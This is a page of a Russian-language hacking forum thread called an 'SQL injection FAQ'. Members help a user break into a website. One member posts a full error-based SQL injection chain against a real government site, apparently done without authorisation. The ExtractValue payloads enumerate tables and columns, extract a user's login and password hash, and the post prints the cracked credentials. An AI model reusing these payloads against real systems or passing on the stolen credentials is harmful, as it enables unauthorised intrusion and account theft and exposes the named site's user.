HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > ИНФО > Статьи > Авторские статьи
Перезагрузить страницу SQL injection полный FAQ
   
 
Страница 17 из 26 « Первая < 7 13 14 15 16 17 18 19 20 21 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #161  
Старый 29.11.2010, 16:27
HBWS
Guest
Сообщений: n/a
Провел на форуме:
55104

Репутация: 0
По умолчанию
Самое полное руководство, из всех что видел. Спасибо.
 

  #162  
Старый 11.01.2011, 12:48
Greenday
Guest
Сообщений: n/a
Провел на форуме:
751

Репутация: 0
По умолчанию
Отличная статья.А где еще можно найти и скачать уязвимые скрипты для изучения уязвимости?
 

  #163  
Старый 08.05.2011, 01:53
FreShBY
Новичок
Регистрация: 03.05.2009
Сообщений: 14
Провел на форуме:
71723

Репутация: 10
По умолчанию
Есть страница

http://test/test/test.html

Попытался сделать инъекцию и вот что вышло

http://test/test/1'+UNION+SELECT+1,+2+--

Результат:

Код:
Code:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'UNION+SELECT+1,+2+--' LIMIT 0,1' at line 1
query=SELECT * FROM structure WHERE p_ID='933' AND url='1'+UNION+SELECT+1,+2+--' LIMIT 0,1
Что я сделал не так и как "добить" эту дырку?
 

  #164  
Старый 08.05.2011, 02:03
[RedSky]
Guest
Сообщений: n/a
Провел на форуме:
3598

Репутация: 10
По умолчанию
Цитата:
Сообщение от FreShBY  
FreShBY said:
Есть страница
http://test/test/test.html
Попытался сделать инъекцию и вот что вышло
http://test/test/1'+UNION+SELECT+1,+2+--
Результат:
Код:
Code:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'UNION+SELECT+1,+2+--' LIMIT 0,1' at line 1
query=SELECT * FROM structure WHERE p_ID='933' AND url='1'+UNION+SELECT+1,+2+--' LIMIT 0,1
Что я сделал не так и как "добить" эту дырку?
Во-первых, коментарием "+--" ты кавычку не отсечешь.

Во-вторых, по ошибке видно данные в запрос попадают напрямую, о чем свидетельствуют плюсы в запросе, попробуй замену пробельного символа + т.к. у тебя выводится и ошибки майскула, то не составляет труда крутить как еррор-байсед.
 

  #165  
Старый 08.05.2011, 02:06
FreShBY
Новичок
Регистрация: 03.05.2009
Сообщений: 14
Провел на форуме:
71723

Репутация: 10
По умолчанию
Цитата:
Сообщение от [RedSky  
"]
[RedSky] said:
Во-первых, коментарием "
+
--" ты кавычку не отсечешь.
Во-вторых, по ошибке видно данные в запрос попадают напрямую, о чем свидетельствуют плюсы в запросе, попробуй замену пробельного символа + т.к. у тебя выводится и ошибки майскула, то не составляет труда крутить как еррор-байсед.
Заменил на пробелы получил:

Код:
Code:
ou have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%202%20--' LIMIT 0,1' at line 1
query=SELECT * FROM structure WHERE p_ID='933' AND url='1'%20UNION%20SELECT%201,%202%20--' LIMIT 0,1
 

  #166  
Старый 08.05.2011, 02:08
[RedSky]
Guest
Сообщений: n/a
Провел на форуме:
3598

Репутация: 10
По умолчанию
Цитата:
Сообщение от FreShBY  
FreShBY said:
Заменил на пробелы получил:
Код:
Code:
ou have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%202%20--' LIMIT 0,1' at line 1
query=SELECT * FROM structure WHERE p_ID='933' AND url='1'%20UNION%20SELECT%201,%202%20--' LIMIT 0,1
Ну очевидно же, зачем на пробелы, данные идут без юрлдекода, крути со скобками, либо пробуй замену типо /**/
 

  #167  
Старый 08.05.2011, 02:16
FreShBY
Новичок
Регистрация: 03.05.2009
Сообщений: 14
Провел на форуме:
71723

Репутация: 10
По умолчанию
Цитата:
Сообщение от [RedSky  
"]
[RedSky] said:
Ну очевидно же, зачем на пробелы, данные идут без юрлдекода, крути со скобками, либо пробуй замену типо /**/
http://test/test/1'/**/UNION/**/SELECT/**/1,/**/2/**/--

По этой ссылке мне выдало:

Код:
Code:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1
query=SELECT * FROM structure WHERE p_ID='933' AND url='1'' LIMIT 0,1
Я уже пол часа пробовал разные варианты, ничего что-то не проходит
 

  #168  
Старый 08.05.2011, 07:01
M_script
Новичок
Регистрация: 04.11.2004
Сообщений: 5
Провел на форуме:
4512

Репутация: 0
По умолчанию
FreShBY, пробел в комментарии должен быть после символов "--", а не перед ними. Если выложишь ссылку, будет быстрее.
 

  #169  
Старый 08.05.2011, 13:48
FreShBY
Новичок
Регистрация: 03.05.2009
Сообщений: 14
Провел на форуме:
71723

Репутация: 10
По умолчанию
Цитата:
Сообщение от M_script  
M_script said:
FreShBY
, пробел в комментарии должен быть после символов "--", а не перед ними. Если выложишь ссылку, будет быстрее.
http://gtk.gov.by/ru/press-center/1'
 

  #170  
Старый 12.05.2011, 05:01
M_script
Новичок
Регистрация: 04.11.2004
Сообщений: 5
Провел на форуме:
4512

Репутация: 0
По умолчанию
Цитата:
Сообщение от FreShBY  
FreShBY said:
http://gtk.gov.by/ru/press-center/1'
Слепая инъекция. Пробел, слэши и некоторые другие символы использовать нельзя из-за ограничений HTTP-протокола. Есть вывод через ошибку с помощью ExtractValue

Запрос:

Код:
Code:
http://gtk.gov.by/ru/press-center/1'or(ExtractValue(1,concat(0x3a,version())))='1
Результат:

Код:
Code:
5.1.53
Из-за того, что нет пробела, использовать limit нельзя. group_concat тоже не работает. Обходится через дополнительные условия, в данном случае колонка data_length в information_schema.tables

Запрос:

Код:
Code:
http://gtk.gov.by/ru/press-center/1'or(ExtractValue(1,concat(0x3a,(select(concat(table_schema,'.',table_name))from(information_schema.tables)where`table_name`like(0x257573657225)and(data_length>0)))))='1
Результат:

Код:
Code:
customsnew.users
Для перебора колонок используется ordinal_position в information_schema.columns, в которой хранится порядковый номер колонки в таблице

Запрос:

Код:
Code:
http://gtk.gov.by/ru/press-center/1'or(ExtractValue(1,concat(0x3a,(select(column_name)from(information_schema.columns)where`table_name`='users'and(ordinal_position=1)))))='1
Меняя ordinal_position от 1 до 6, получаем имена всех колонок

Результат:

Код:
Code:
ID,login,password,name,email,comment
В таблице users всего одна запись. Получаем имя

Запрос:

Код:
Code:
http://gtk.gov.by/ru/press-center/1'or(ExtractValue(1,concat(0x3a,(select(login)from(users)where(id=1)))))='1
Результат:

Код:
Code:
olga
Так как вывод через ExtractValue ограничен 31 символом, хэш пароля получаем двумя запросами

Запрос 1:

Код:
Code:
http://gtk.gov.by/ru/press-center/1'or(ExtractValue(1,concat(0x3a,(select(password)from(users)where(id=1)))))='1
Запрос 2:

Код:
Code:
http://gtk.gov.by/ru/press-center/1'or(ExtractValue(1,concat(0x3a,mid((select(password)from(users)where(id=1)),32,1))))='1
Результат:

Код:
Code:
79e4b4438aba2b6d8e1caf9568e73e12
Расшифровываем хэш по радужным таблицам.

Результат:

Код:
Code:
olga:olga11
 
 
Страница 17 из 26 « Первая < 7 13 14 15 16 17 18 19 20 21 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
SQL Injection: Modes of Attack, Defence, and Why It Matters bxN5 Forum for discussion of ANTICHAT 1 09.04.2007 19:07
SQL Injection FAQ bx_N Forum for discussion of ANTICHAT 2 08.03.2007 18:48



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ